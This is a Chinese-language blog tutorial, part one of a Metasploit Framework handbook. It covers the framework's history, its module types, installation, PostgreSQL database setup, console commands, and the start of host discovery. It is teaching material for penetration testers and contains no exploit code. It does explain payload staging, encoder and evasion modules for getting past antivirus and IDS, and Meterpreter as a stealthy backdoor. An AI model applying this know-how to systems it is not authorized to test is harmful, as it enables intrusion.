Metasploit Framework Handbook

阅读量437674

|评论2

|

发布时间 : 2020-07-08 15:30:48

 

前言

众所周知Metasploit工具是一款强大的渗透测试利器,在渗透测试中堪称一条龙服务,那么很多人真的能够认识到它其中的强大之处吗,了解其中的每部分功能吗,还是说在个别人眼中只是一个由虚拟机搭建的一个小拓扑使用其直接攻打windows主机拿到主机权限就结束了吗,事实上Metasploit这款工具能做的事情很多,包括:情报(信息)搜集、目标识别、服务枚举、漏洞探测、漏洞利用、权限提升、权限维持、社会工程、内网渗透等一系列操作。

由于网上大部分相关文章对于Metasploit框架没有一个整体而完整的讲解,很多都是讲述的某一个功能点或者漏洞的使用,比如:如何使用Metasploit进行内网代理渗透、如何使用Metasploit打开对方电脑摄像头、如何使用Metasploit监视对方主机、如何使用Metasploit利用永恒之蓝漏洞攻击Windows主机、Metasploit基础、Metasploit指令用法等等,这一现象也就造成了知识点的零碎、意乱,一定程度上导致初学者的盲目、误导等。

正因如此自己才打算总结整理一份关于Metasploit框架的使用手册:Metasploit Framework Handbook 主要讲述的是Metasploit框架的一个整体使用手册(包括工具模块的解读+实战操作),该手册主要分为四部分,如下:

  • 第一部分:Metasploit Framework Handbook (一)

Metasploit解读+实战操作(发展、框架、安装、配置、指令解读、情报搜集、渗透测试)

  • 第二部分:Metasploit Framework Handbook (二)

Meterpreter解读+实战操作(指令解读、内网渗透-后渗透-1)

  • 第三部分:Metasploit Framework Handbook (三)

Meterpreter解读+实战操作(内网渗透-后渗透-2)

  • 第四部分:Metasploit Framework Handbook (四)

MSFvenom解读+实战操作(指令解读、后门木门)

本文Metasploit Framework Handbook (一)主要讲述的是手册的第一部分:Metasploit解读+实战操作(发展、框架、安装、配置、指令解读、情报搜集、渗透测试)

 

MsFramework

 

Metasploit

Metasploit 是一个的渗透测试开源软件,也是一个逐步发展成熟的漏洞研究与渗透测试代码开发平台,此外也将成为支持整个渗透测试过程的安全技术集成开发与应用环境。

  • 官方相关链接
官网   https://www.rapid7.com/

Github https://github.com/rapid7/metasploit-framework

诞生发展

Metasploit 项目最初是由 HD Moore 在 2003 年夏季创立,目标是成为渗透攻击研究与代码开发的一个开放资源(工具集,武器库)。当时HD还是Digital Defense安全公司雇员,当他意识到他的绝大多数时间是在用来验证和处理那些公开发布的渗透代码时,他开始为编写和开发渗透代码构建一个灵活且可维护的框架平台,并在2003年10 月发布了他的第一个基于 Perl 语言(pl)的 Metasploit 版本,当时一共集成了 11 个渗透攻击模块。

虽然Metasploit在设计之初就具有宏伟的目标,但在v1.0发布之后并没有引起太多的关注,在SecurityFocus的渗透测试邮件组中的发布邮件仅仅只有一个回复,当时的Metasploit v1.0看起来仅仅是将大家都能获取的11个渗透代码打了一个包而已。但这次发布使得HD Moore吸引了一位志同道合之士Spoonm,他帮助HD一起完全重写了代码,并在2004年4月发布了Metasploit v2.0,版本中已经包含18个渗透攻击模块和27个攻击载荷模块,并提供了控制台终端、命令行和Web三个使用接口。

在 2004 年 8 月,HD 和 Spoonm 带着最新发布的 Metasploit v2.2 并在拉斯维加斯举办的 BlackHat 全球黑客大会上进行了演讲。听众被 Metasploit 的强大之处所折服,并一致认为:Metasploit 时代已经到来。更多的黑客加入 Metasploit 核心开发团队与贡献渗透攻击、载荷与辅助模块代码。

在Metasploit项目进入一个发展快车道时,HD Moore与Spoonm已经敏锐地意识到了其中存在的危机。在2005年的CanSecWest黑客会议上,他们指出Metasploit v2体系框架中的一些难以解决的难题,包括:

缺乏跨平台支持,特别是不能很好地运行在 Windows 系统上。

很难支持自动化渗透攻击过程

Perl 语言的复杂性和缺点使得外部贡献者与用户规模增长不相适应

Perl 语言对一些复杂特性的支持能力较弱等。

而且 v2 版本是完全围绕着渗透攻击而设计的,对信息搜集与后渗透攻击阶段无法提供有效支持。经过 18 个月的时间,Metasploit 团队使用 Ruby 语言(.rb)完全重写了 Metasploit ,并在 2007 年 5 月发布了 v3.0 版本,其中包含 177 个渗透攻击模块、104 个攻击载荷模块以及 30 个新引入的辅助模块。

Metasploit v3.0 的发布使得 Metasploit 不在限于用作渗透攻击软件,而真正成为一个事实上的渗透测试技术研究与开发平台。黑客们开始接受并使用Metasploit渗透攻击模块的编程语言和格式发布他们的渗透代码,并以Metasploit框架为平台开发一些新的攻击工具,以及将之前的安全工具移植到Metasploit中。

Metasploit v3.3版本时已经快速发展到796个模块、41.9 万行代码,成为全世界最大的Ruby语言开发项目。而Metasploit v3不断扩充的功能与特性,以及与其他安全工具之间的灵活API接口,也为渗透测试者们提供一个绝 佳的渗透软件平台,Metasploit 在安全社区取得了更加广泛的用户群。

2009 年 10 月,Metasploit 项目被一家渗透测试技术领域的知名安全公司 Rapid7 所收购,HD Moore全职加人Rapid7,担任首席安全官和Metasploit首席架构师。其他一些Metasploit开发团队的人员也全职加人到Rapid7公司中。由HD Moore带领专门从事Metasploit的开发,而Metasploit框架仍然保持开源发布和活跃的社区参与,这使得收购之后Metasploit的更新比所有人预期的都还要快。当然,Rapid7公司也从收购Metasploit中得到很大的好处,进一步推广公司的旗舰漏洞扫描产品NetXpose。随后于2010年10月推出MetasploitExpress和Pro商业版本,从而进军商业化渗透测试解决方案市场。

Metasploit v4.0 在 2011 年 8 月发布。v4.0 版本在渗透攻击、攻击载荷与辅助模块的数量上都有显著的扩展,此外还引入一种新的模块类型——后渗透攻击模块,以支持在渗透攻击环节中进行敏感信息搜集、内网拓展等一系列的攻击测试。

Metasploit v5.0 在 2019 年 1 月份发布。Metasploit 5.0 使用了新的数据库,并提供了一种新的数据服务。新版本引入了新的规避机制(evasion capabilities),支持多项语言,框架建立在不断增长的世界级攻击性内容库的框架基础上。另外,此次更新还包括了可用性改进和大规模开发的支持,数据库和自动化 API 的改进等。

体系结构

Metasploit的设计尽可能采用模块化的理念,以提升代码复用效率。在基础库文件(Libraries)中提供了核心框架和一些基础功能的支持。而实现渗透测试功能的主体代码则以模块化方式组织,并按照不同用途分为7种类型的模块(Modules) ;为了扩充Metasploit框架对渗透测试全过程的支持功能特性,Metasploit 还引入了插件(Plugins) 机制,支持将外部的安全工具集成到框架中; Metasploit 框架对集成模块与插件的渗透测试功能,通过用户接口(Interfaces) 与功能程序(Utilities) 提供给渗透测试者和安全研究人员进行使用。

 → Qftm :/usr/share/metasploit-framework/modules# ls
auxiliary  encoders  evasion  exploits  nops  payloads  post
 → Qftm :/usr/share/metasploit-framework/modules#

辅助模块

  • auxiliary
 → Qftm :/usr/share/metasploit-framework/modules/auxiliary# ls
admin    bnat    cloud    docx  example.rb  fuzzers  parser  scanner  sniffer  sqli  vsploit analyze  client  crawler  dos   fileformat  gather   pdf     server   spoof    voip
 → Qftm :/usr/share/metasploit-framework/modules/auxiliary#

Metasploit 为渗透测试的信息搜集环节提供了大量的辅助模块支持,包括针对各种网络服务的扫描与查点、构建虚假服务收集登录密码、口令猜测破解、敏感信息嗅探、探查敏感信息泄露、Fuzz 测试发掘漏洞、实施网络协议欺骗等模块。辅助模块能够帮助渗透测试者在渗透攻击之前取得目标系统丰富的情报信息,从而发起更具目标性的精准攻击。

渗透攻击模块

  • exploits
 → Qftm :/usr/share/metasploit-framework/modules/exploits# ls
aix        bsd     example_linux_priv_esc.rb  firefox  irix       multi    osx   solaris
android    bsdi    example.rb                 freebsd  linux      netware  qnx   unix
apple_ios  dialup  example_webapp.rb          hpux     mainframe  openbsd  self  windows
 → Qftm :/usr/share/metasploit-framework/modules/exploits#

渗透攻击模块是利用发现的安全漏洞或配置弱点对目标系统进行攻击,以植入和运行攻击载荷,从而获取对远程目标系统访问权的代码组件。

Metasploit框架中渗透攻击模块可以按照所利用的安全漏洞所在的位置分为主动渗透攻击与被动渗透攻击两大类。

  • 主动渗透攻击

主动渗透攻击所利用的安全漏洞位于网络服务端软件与服务承载的上层应用程序之中,由于这些服务通常是在主机上开启一些监听端口并等待客户端连接,因此针对它们的渗透攻击可以主动发起,通过连接目标系统网络服务,注入一些特殊构造的包含”邪恶”攻击数据的网络请求内容,触发安全漏洞,并使得远程服务进程执行在”邪恶”数据中包含攻击载荷,从而获取目标系统的控制会话。

  • 被动渗透攻击

被动渗透攻击利用的漏洞位于客户端软件中,如浏览器、浏览器插件、电子邮件客户端、Office 与 Adobe 等各种文档阅读与编辑软件。对于这类存在于客户端软件的安全漏洞,我们无法主动地将数据从远程输入到客户端软件中,因此只能采用被动渗透攻击的方式,即构造出”邪恶”的网页、电子邮件或文档文件,并通过架设包含此类恶意内容的服务、发送邮件附件、结合社会工程学分发并诱骗目标用户打开、结合网络欺骗和劫持技术等方式,等目标系统上的用户访问到这些邪恶的内容,从而触发客户端软件中的安全漏洞,给出控制目标系统的 Shell 会话。

攻击载荷模块

  • payloads
    → Qftm :/usr/share/metasploit-framework/modules/payloads# ls
    singles  stagers  stages
    → Qftm :/usr/share/metasploit-framework/modules/payloads#
    

攻击载荷是在渗透攻击成功后使目标系统运行的一段植入代码,通常作用是为渗透攻击者打开在目标系统上的控制会话连接。

Metasploit攻击载荷模块分为独立(Singles)、传输器(Stager)、传输体(Stage)

独立攻击载荷是完全自包含的,可直接独立地植人目标系统进行执行,比如“windows/shell_bind_tcp”是适用于Windows操作系统平台,能够将Shell控制会话绑定在指定TCP端口上的攻击载荷。在一些比较特殊的渗透攻击场景中,可能会对攻击载荷的大小、运行条件有所限制,比如特定安全漏洞利用时可填充邪恶攻击缓冲区的可用空间很小、Windows 7等新型操作系统所引人的NX (堆栈不可执行)、DEP (数据执行保护)等安全防御机制,在这些场景情况下,Metasploit 提供了传输器(Stager) 和传输体(Stage)配对分阶段植入的技术,由渗透攻击模块首先植人代码精悍短小且非常可靠的传输器载荷,然后在运行传输器载荷时进一步下载传输体载荷并执行。目前Metasploit中的Windows传输器载荷可以绕过NX、DEP等安全防御机制,可以兼容Windows7操作系统,而由传输器载荷进一步下载并执行的传输体载荷就不再受大小和安全防御机制的限制,可以加载如Meterpreter、VNC桌面控制等复杂的大型攻击载荷。传输器与传输体配对的攻击载荷模块以名称中的“/”标识,“windows/shell/bind_tcp"是由一个传输器载荷(bind_tcp) 和一个传输体载荷(Shell) 所组成的,其功能等价于独立攻击载荷“windows/shell_bind_tcp"。Metasploit所引人的多种类型载荷模块使得这些预先编制的模块化载荷代码能够适用于绝大多数的平台和攻击场景,这也为Metasploit能够成为通用化的渗透攻击与代码开发平台提供了非常有力的支持。

空指令模块

  • nops
 → Qftm :/usr/share/metasploit-framework/modules/nops# ls
aarch64  armle  mipsbe  php  ppc  sparc  tty  x64  x86
 → Qftm :/usr/share/metasploit-framework/modules/nops#

空指令(NOP) 是一些对程序运行状态不会造成任何实质影响的空操作或者无关操作指令,最典型的空指令就是空操作,在 x86 CPU 体系架构平台上的操作码是 0x90 。

在渗透攻击构造邪恶数据缓冲区时,常常要在真正要执行的Shellcode之前添加一段空指令区,这样当触发渗透攻击后跳转执行Shellcode 时,有一个较大的安全着陆区,从而避免受到内存地址随机化、返回地址计算偏差等原因造成的Shellcode执行失败,提高渗透攻击的可靠性。Metasploit 框架中的空指令模块就是用来在攻击载荷中添加空指令区,以提高攻击可靠性的组件。

编码器模块

  • encoders
 → Qftm :/usr/share/metasploit-framework/modules/encoders# ls
cmd  generic  mipsbe  mipsle  php  ppc  ruby  sparc  x64  x86
 → Qftm :/usr/share/metasploit-framework/modules/encoders#

攻击载荷模块与空指令模块组装完成一个指令序列后,在这段指令被渗透攻击模块加入邪恶数据缓冲区交由目标系统运行之前,Metasploit 框架还需要完成一道非常重要的工序 – 编码(Encoding)。如果没有这道工序,渗透攻击可能完全不会奏效,或者中途就被检测到并阻断。这道工序是由编码器模块所完成的。

编码器模块的第一个使命是确保攻击载荷中不会出现滲透攻击过程中应加以避免的“坏字符”,这些“坏字符”的存在将导致特殊构造的邪恶数据缓冲区无法按照预期目标完输人到存有漏洞的软件例程中,从而使得渗透攻击触发漏洞之后无法正确执行攻击载荷,达成控制系统的目标。

编码器的第二个使命就是对攻击载荷进行”免杀”处理,即逃避反病毒软件、IDS 人侵检测系统和IPS人侵防御系统的检测与阻断。

后渗透攻击模块

  • post
 → Qftm :/usr/share/metasploit-framework/modules/post# ls
aix  android  apple_ios  brocade  bsd  cisco  firefox  hardware  juniper  linux  multi  osx  solaris  windows
 → Qftm :/usr/share/metasploit-framework/modules/post#

后渗透攻击模块主要支持在渗透攻击取得目标系统控制权之后,在受控系统中进行各式各样的后渗透攻击动作,比如获取敏感信息、进一步拓展、实施跳板攻击等。

在后渗透攻击阶段,Metasploit框架中功能最强大、最具发展前景的模块是Meterpreter,Meterpreter 作为可以被渗透攻击植入到目标系统上执行的一个攻击载荷,除了提供基本的控制会话之外,还集成了大量的后渗透攻击命令与功能,并通过大量的后渗透攻击模块进一步提升它在本地攻击与内网拓展方面的能力。

免杀模块

  • evasion
 → Qftm :/usr/share/metasploit-framework/modules/evasion# ls
windows
 → Qftm :/usr/share/metasploit-framework/modules/evasion#

免杀模块核心功能对攻击载荷进行”免杀”处理。

功能阶段

渗透攻击是目前 Metasploit 最强大和最具吸引力的核心功能,Metasploit 框架中集成了数百个针对主流操作系统平台上,不同网络服务与应用软件安全漏洞的渗透攻击模块,可以由用户在渗透攻击场景中根据漏洞扫描结果进行选择,并能够自由装配该平台上适用的具有指定功能的攻击载荷,然后通过自动化编码机制绕过攻击限制与检测措施,对目标系统实施远程攻击,获取系统的访问控制权。

除了渗透攻击之外,Metasploit 在发展过程中逐渐增加对渗透测试全过程的支持,包括情报搜集、威胁建模、漏洞分析、后渗透攻击与报告生成。

情报搜集阶段

Metasploit 一方面通过内建的一系列扫描器与查点辅助模块来获取远程服务器信息,另一方面通过插件机制集成调用 Nmap、Nessus、OpenVAS 等业界著名的开源网络扫描工具,从而具备全面的信息搜集能力,为渗透攻击实施提供必不可少的精确情报。

目标识别与服务枚举

集成插件,漏洞扫描

威胁建模阶段

在搜集信息之后,Metasploit 支持一系列数据库命令操作直接将这些信息汇总至PostgreSQL、MySQL、SQLite 数据库中,并为用户提供易用的数据库查询命令,可以帮助渗透测试者对目标系统搜索到的情报进行威胁建模,从中找出最可行的攻击路径。

漏洞分析阶段

除了信息搜集环节能够直接扫描出一些已公布的安全漏洞之外,Metasploit 中还提供了大量的协议 Fuzz 测试器与 Web 应用漏洞探测分析模块,支持具有一定水平能力的渗透测试者在实际过程中尝试挖掘出 0Day 漏洞,并对漏洞机理与利用方法进行深入分析,而这将为渗透攻击目标带来更大的杀伤力,并提升渗透测试流程的技术含金量。

后渗透攻击阶段

在成功实施渗透攻击并获得目标系统的远程控制权之后,Metasploit 框架中另一个极具威名的工具 Meterpreter 在后渗透攻击阶段提供了强大功能。

Meterpreter 可以看作一个支持多操作系统平台,可以仅仅驻留于内存中并具备免杀能力的高级后门工具,Meterpreter 中实现了特权提升、信息提取、系统监控、跳板攻击与内网拓展等多样化的功能特性,此外还支持一种灵活可扩展的方式来加载额外功能的后渗透攻击模块。

报告生成阶段

Metasploit 框架获得的渗透测试结果可以输入至内置数据库中,因此这些结果可以通过数据查询来获取,并辅助渗透测试报告的写作。

商业版的 Metasploit Pro 具备了更加强大的报告生成功能,可以输出 HTML、XML、Word和 PDF 格式的报告。

工具管理

安装

  • 官方安装Wiki
https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers

更新

  • 以Debian-kali为例

MSF 安装路径 /usr/share/metasploit-framework,如果使用msf自带的更新组件msfupdate会显示更新失败不再支持

 → Qftm :~/Desktop# msfupdate 
msfupdate is no longer supported when Metasploit is part of the operating
system. Please use 'apt update; apt install metasploit-framework'
 → Qftm :~/Desktop#

使用系统apt包管理工具进行更新

sudo apt-get update
sudo apt-get install metasploit-framework

数据库连接

自动配置连接数据库

  • 启动postgresql数据库服务
 → Qftm :~/Desktop# service postgresql status
● postgresql.service - PostgreSQL RDBMS
     Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; vendor preset: disabled)
     Active: inactive (dead)
 → Qftm :~/Desktop# service postgresql start
 → Qftm :~/Desktop# service postgresql status
● postgresql.service - PostgreSQL RDBMS
     Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; vendor preset: disabled)
     Active: active (exited) since Wed 2020-06-24 03:24:56 EDT; 3s ago
    Process: 4575 ExecStart=/bin/true (code=exited, status=0/SUCCESS)
   Main PID: 4575 (code=exited, status=0/SUCCESS)

Jun 24 03:24:56 Pentesting systemd[1]: Starting PostgreSQL RDBMS...
Jun 24 03:24:56 Pentesting systemd[1]: Started PostgreSQL RDBMS.
 → Qftm :~/Desktop#
  • msf连接配置

初始化msfdb

 → Qftm ← :~# msfdb init
[+] Starting database
[+] Creating database user 'msf'
为新角色输入的口令: 
再输入一遍: 
[+] Creating databases 'msf'
[+] Creating databases 'msf_test'
[+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml'
[+] Creating initial database schema
 → Qftm ← :~#

启动MSF查看数据库连接情况

 → Qftm :~/Desktop# msfconsole 


MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
        https://metasploit.com


       =[ metasploit v5.0.93-dev                          ]
+ -- --=[ 2029 exploits - 1100 auxiliary - 344 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Display the Framework log using the log command, learn more with help log

[*] Starting persistent handler(s)...
msf5 > 
msf5 > db_status 
[*] Connected to msf. Connection type: postgresql.
msf5 >

如果要设置自动登录,需要修改配置文件/usr/share/metasploit-framework/config/database.yml,默认初始化已经配置好了。

production:
  adapter: postgresql
  database: msf
  username: msf
  password: n1CV4/9NcMUEvg4x90GhPOV6EfPBX/Ai7gY1a2fNdZQ=
  host: localhost
  port: 5432
  pool: 5
  timeout: 5

手工配置连接数据库

  • 启动postgresql数据库服务
 → Qftm :~/Desktop# service postgresql status
● postgresql.service - PostgreSQL RDBMS
     Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; vendor preset: disabled)
     Active: inactive (dead)
 → Qftm :~/Desktop# service postgresql start
 → Qftm :~/Desktop# service postgresql status
● postgresql.service - PostgreSQL RDBMS
     Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; vendor preset: disabled)
     Active: active (exited) since Wed 2020-06-24 03:24:56 EDT; 3s ago
    Process: 4575 ExecStart=/bin/true (code=exited, status=0/SUCCESS)
   Main PID: 4575 (code=exited, status=0/SUCCESS)

Jun 24 03:24:56 Pentesting systemd[1]: Starting PostgreSQL RDBMS...
Jun 24 03:24:56 Pentesting systemd[1]: Started PostgreSQL RDBMS.
 → Qftm :~/Desktop#
  • 进入postgresql配置

设置数据库账户密码:postgres:adminp

 → Qftm :~/Desktop# sudo -u postgres psql
sudo: unable to resolve host Pentesting: Name or service not known
psql (12.1 (Debian 12.1-2))
Type "help" for help.

postgres=# alter user postgres password 'adminp';
ALTER ROLE
postgres=# q
 → Qftm :~/Desktop#
  • 设置账户认证方式
 → Qftm :~/Desktop# mousepad /etc/postgresql/12/main/postgresql.conf 
password_encryption = md5        # md5 or scram-sha-256
 → Qftm :~/Desktop#
  • 重启数据库服务
 → Qftm :~/Desktop# service postgresql restart
 → Qftm :~/Desktop# service postgresql status
● postgresql.service - PostgreSQL RDBMS
     Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; vendor preset: disabled)
     Active: active (exited) since Wed 2020-06-24 03:35:54 EDT; 4s ago
    Process: 4734 ExecStart=/bin/true (code=exited, status=0/SUCCESS)
   Main PID: 4734 (code=exited, status=0/SUCCESS)

Jun 24 03:35:54 Pentesting systemd[1]: Starting PostgreSQL RDBMS...
Jun 24 03:35:54 Pentesting systemd[1]: Started PostgreSQL RDBMS.
 → Qftm :~/Desktop#
  • 连接数据库
 → Qftm :~/Desktop# psql -U postgres -h 127.0.0.1
Password for user postgres: 
psql (12.1 (Debian 12.1-2))
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)
Type "help" for help.

postgres=#
  • 新建数据库
postgres=# create user msf with password 'adminp' createdb;
ERROR:  role "msf" already exists
postgres=# 
postgres=# create database msf with owner=msf;
ERROR:  database "msf" already exists
postgres=#
  • msf连接配置

启动msf控制台,输入db_status查看数据库连接状态

 → Qftm :~/Desktop# msfconsole 


      .:okOOOkdc'           'cdkOOOko:.                                                                                        
    .xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.                                                                                      
   :OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:                                                                                     
  'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'                                                                                    
  oOOOOOOOO.    .oOOOOoOOOOl.    ,OOOOOOOOo                                                                                    
  dOOOOOOOO.      .cOOOOOc.      ,OOOOOOOOx                                                                                    
  lOOOOOOOO.         ;d;         ,OOOOOOOOl                                                                                    
  .OOOOOOOO.   .;           ;    ,OOOOOOOO.                                                                                    
   cOOOOOOO.   .OOc.     'oOO.   ,OOOOOOOc                                                                                     
    oOOOOOO.   .OOOO.   :OOOO.   ,OOOOOOo                                                                                      
     lOOOOO.   .OOOO.   :OOOO.   ,OOOOOl                                                                                       
      ;OOOO'   .OOOO.   :OOOO.   ;OOOO;                                                                                        
       .dOOo   .OOOOocccxOOOO.   xOOd.                                                                                         
         ,kOl  .OOOOOOOOOOOOO. .dOk,                                                                                           
           :kk;.OOOOOOOOOOOOO.cOk:                                                                                             
             ;kOOOOOOOOOOOOOOOk:                                                                                               
               ,xOOOOOOOOOOOx,                                                                                                 
                 .lOOOOOOOl.                                                                                                   
                    ,dOd,                                                                                                      
                      .                                                                                                        

       =[ metasploit v5.0.93-dev                          ]
+ -- --=[ 2029 exploits - 1100 auxiliary - 344 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Display the Framework log using the log command, learn more with help log

[*] Starting persistent handler(s)...
msf5 > db_status 
[*] Connected to msf. Connection type: postgresql.
msf5 >

可以看到数据库已经自动连接上了,如果没有,就需要手动输入以下命令连接

msf5 > db_connect msf:adminp@127.0.0.1/msf

notes

msf:数据库名
adminp:密码
@:固定格式
127.0.0.1:登录地址

如果要设置自动登录,需要修改配置文件/usr/share/metasploit-framework/config/database.yml

production:
  adapter: postgresql
  database: msf
  username: msf
  password: n1CV4/9NcMUEvg4x90GhPOV6EfPBX/Ai7gY1a2fNdZQ=
  host: localhost
  port: 5432
  pool: 5
  timeout: 5

基本命令

启动msf

 → Qftm :~/Desktop# msfconsole 

 _                                                    _
/     /         __                         _   __  /_/ __
| |  / | _____               ___   _____ | | /   _    
| | /| | | ___ |- -|   /    / __ | -__/ | || | || | |- -|
|_|   | | | _|__  | |_  / - __    | |    | | __/| |  | |_
      |/  |____/  ___/ / \___/   /     __|    |_  ___


       =[ metasploit v5.0.93-dev                          ]
+ -- --=[ 2029 exploits - 1100 auxiliary - 344 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Open an interactive Ruby terminal with irb

[*] Starting persistent handler(s)...
msf5 >

命令解读

  • MSF Console Command
msf5 > help

Core Commands
=============

    Command       Description
    -------       -----------
    ?             帮助手册
    banner        展示Metasploit框架信息
    cd            改变当前工作目录
    color         切换颜色(true|false|auto)
    connect       远程连接-与主机通信
    exit          退出Metasploit终端控制台
    get           获取特定上下文变量的值
    getg          获取一个全局变量的值
    grep          grep另一个命令的输出
    help          帮助手册
    history       查看Metasploit控制台中使用过的历史命令
    load          加载框架中的插件
    quit          退出Metasploit终端控制台
    repeat        Repeat a list of commands
    route         Route traffic through a session
    save          保存活动的数据存储
    sessions      显示会话列表和有关会话的信息(sessions -h      列出sessions命令的帮助信息
                                           sessions -i      查看所有的会话(基本信息)
                                           sessions -v      列出所有可用交互会话及会话详细信息
                                           sessions -i id   通过 ID 号,进入某一个交互会话
                                           exit             直接退出会话
                                           background       将会话隐藏在后台
                                           sessions -K      杀死所有存活的交互会话)
    set           设置一个特定的上下文变量(选项)的值
    setg          设置一个全局变量的值
    sleep         Do nothing for the specified number of seconds
    spool         Write console output into a file as well the screen
    threads       查看和操作后台线程
    tips          Show a list of useful productivity tips
    unload        卸载已加载框架插件
    unset         取消设置的一个或多个特定的上下文变量
    unsetg        取消设置的一个或多个全局变量的
    version       查看框架和控制台库版本号


Module Commands
===============

    Command       Description
    -------       -----------
    advanced      显示一个或多个模块的高级(详细)选项
    back          从当前上下文返回(退出当前正在使用的模块,返回原始控制台(模块的配置依然有效))
    clearm        清除该模块的堆栈信息
    info          显示有关一个或多个模块的信息
    listm         显示该模块的堆栈信息
    loadpath      从路径搜索并加载模块
    options       显示一个或多个模块的全局选项信息(option|show option)
    popm          将最新模块弹出堆栈并使其激活
    previous      将先前加载的模块设置为当前模块
    pushm         将活动模块或模块列表推入模块堆栈
    reload_all    从所有定义的模块路径重新加载所有模块
    search        搜索相关模块的名称和描述(search cve:2009 type:exploit platform:-linux)
    show          查看显示给定类型的模块,或所有模块(show exploits|post|nop...)
    use           装载一个渗透攻击或者模块
                    (use ModuleName    use exploit/windows/smb/ms17_010_eternalblue
                      info              查看模块的详细信息
                      options           查看脚本配置选项
                      show options        查看脚本配置选项
                      show targets      显示适用的主机类型
                      set               设置模块选项
                      run                启动脚本
                      exploit           启动脚本)


Job Commands(作业==运行的模块)
============

    Command       Description
    -------       -----------
    handler       启动有效负载处理程序作为作业进程
    jobs          查看和管理作业进程(查看和管理当前运行的模块)
    kill          关闭|杀死一个作业进程
    rename_job    重命名作业进程


Resource Script Commands
========================

    Command       Description
    -------       -----------
    makerc        将启动控制台以后要输入的命令保存到文件中(批处理文件)
    resource      运行存储在文件中的命令(运行批处理文件)


Database Backend Commands
=========================

    Command           Description
    -------           -----------
    analyze           分析有关特定地址或地址范围的数据库信息
    db_connect        连接到现有的数据库服务(db_connect msf:adminp@127.0.0.1/msf)
    db_disconnect     断开当前数据库服务
    db_export         导出包含数据库内容的文件
    db_import         导入扫描结果文件(将自动检测文件类型)
    db_nmap           执行nmap并自动记录输出到数据库中(集成的nmap,对nmap的一个封装)
    db_rebuild_cache  重建数据库存储的模块缓存(不建议使用)
    db_remove         删除保存的数据库服务条目
    db_save           将当前数据库服务连接保存为默认值,以便在启动时重新连接
    db_status         显示当前数据库服务状态
    hosts             列出数据库中的所有主机
    loot              列出数据库中的所有战利品
    notes             列出数据库中的所有注释
    services          列出数据库中的所有服务
    vulns             列出数据库中的所有漏洞
    workspace         在数据库工作区之间切换


Credentials Backend Commands
============================

    Command       Description
    -------       -----------
    creds         列出数据库中的所有凭据


Developer Commands
==================

    Command       Description
    -------       -----------
    edit          使用首选编辑器编辑当前模块或文件
    irb           在当前上下文中打开一个交互式Ruby Shell
    log           如果可能,将framework.log显示到页面末尾(查看日志信息)
    pry           在当前模块或框架上打开Pry调试器
    reload_lib    从指定路径重新加载Ruby库文件
  • MSF Console Module Command
msf5 auxiliary(xxx/xxx/xxx) > help

Auxiliary Commands
==================

    Command       Description
    -------       -----------
    check         检查目标是否存在漏洞
    exploit       run命令的别名
    rcheck        重新加载该辅助模块并检查目标是否存在漏洞
    recheck       rcheck命令的别名
    reload        重新加载该辅助模块(已配置的选项还在)
    rerun         重新加载该辅助模块并运行该模块
    rexploit      rerun命令的别名
    run           运行选中的辅助模块

msf5 exploit(xxx/xxx/xxx) > help

Exploit Commands
================

    Command       Description
    -------       -----------
    check         检查目标是否存在漏洞
    exploit       对目标发起攻击
    rcheck        重新加载该辅助模块并检查目标是否存在漏洞
    recheck       rcheck命令的别名
    reload        重新加载该渗透攻击模块(已配置的选项还在)
    rerun         rexploit命令的别名
    rexploit      重新加载该渗透攻击模块并运行该模块对目标发起攻击
    run           exploit命令的别名

msf5 payload(xxx/xxx/xxx) > help

Payload Commands
================

    Command       Description
    -------       -----------
    check         检查目标是否存在漏洞
    generate      Generates a payload
    reload        从磁盘重新加载当前模块
    to_handler    创建具有指定有效负载的处理程序

情报搜集

主机发现

Metasploit 中提供了一些辅助模块可用于主机发现,这些模块位于modules/auxiliary/scanner/discovery/ 目录中。

use auxiliary/scanner/discovery/arp_sweep
use auxiliary/scanner/discovery/empty_udp
use auxiliary/scanner/discovery/ipv6_multicast_ping
use auxiliary/scanner/discovery/ipv6_neighbor
use auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement
use auxiliary/scanner/discovery/udp_probe
use auxiliary/scanner/discovery/udp_sweep

使用 arp 请求来枚举本地局域网中的所有活跃主机

msf5 > use auxiliary/scanner/discovery/arp_sweep 
msf5 auxiliary(scanner/discovery/arp_sweep) > options 

Module options (auxiliary/scanner/discovery/arp_sweep):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   INTERFACE                   no        The name of the interface
